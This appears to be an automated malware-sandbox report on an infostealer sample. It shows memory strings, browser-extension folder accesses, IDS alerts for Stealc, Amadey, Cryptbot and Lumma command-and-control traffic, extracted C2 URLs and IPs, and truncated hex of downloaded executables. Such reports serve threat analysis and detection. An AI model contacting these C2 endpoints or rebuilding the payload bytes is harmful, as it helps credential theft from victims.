Source:	Binary string: 8ucrtbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000031.00000002.3375134799.0000024F747BC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8audioses.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sspicli.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8rasadhlp.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8msvcp_win.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8taskschd.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb8 source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dnsapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nlaapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8fwpuclnt.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winhttp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msimg32.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mswsock.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntasn1.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: devobj.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8advapi32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.Storage.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8OnDemandConnRouteHelper.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8netprofm.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: avrt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.Globalization.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000031.00000002.3376454757.0000024F749A9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WLDP.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8vcruntime140_1.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8lgpllibs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nssckbi.pdb@ source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8gdi32full.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8vcruntime140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winrnr.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dbgcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8OnDemandConnRouteHelper.pdb0B source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: user32.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8DataExchange.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8wintrust.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8WindowManagementAPI.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8npmproxy.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8linkinfo.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.UI.Immersive.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 41MB
Source: firefox.exe	Memory has grown: Private usage: 0MB later: 182MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49782 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49789
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49821 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49864 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49870 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49896 -> 34.116.198.130:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49906 -> 34.116.198.130:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49924 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49926 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50033 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49947 -> 34.116.198.130:80
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49885 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49998 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49928 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49983 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49893 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49893 -> 172.67.162.84:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://property-imper.sbs/api
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: DNS query count 33

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 